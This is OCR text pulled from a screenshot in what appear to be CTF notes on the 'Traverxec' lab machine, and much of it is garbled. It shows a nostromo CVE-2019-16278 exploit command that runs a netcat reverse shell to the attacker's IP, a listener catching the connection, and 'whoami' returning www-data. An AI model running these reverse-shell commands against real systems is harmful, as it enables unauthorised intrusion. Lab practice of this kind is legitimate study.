{"path":"zzz_res/attachments/Screenshot_2020-02-18_22-28-18.png","text":"Server: nostromo 1.9.6 Connection: close Jusr/bin/netcat o0tk iz~/Docunents/CTF/Machine/Traverxeck python 47837.py 10.10.10.165 80 \"/usr/bin/netcat 10.10.14.31 4321 -e /bin/bash\" -2019-16278 AV R W 11 771 | [ A 2] VA | VAR /] | AN AN V] R S N 1 | P3N N \\ | I NN NN N SN I M I TN ] [N N (I N â€” Nl 1 Nl N T - 17 0 < root@kli~/Documents/CTF/Machine/Traverxec 13727 rootakali:z~/Documents/CTF/Machine/Traverxec# nc -lvp 4321 listening on [any] 4321 ... 10.10.10.165: inverse host lookup failed: Unknown host connect to [10.10.14.31] from (UNKNOWN) [10.10.10.165] 46124 whoami www-data","libVersion":"0.5.0","langs":"eng"}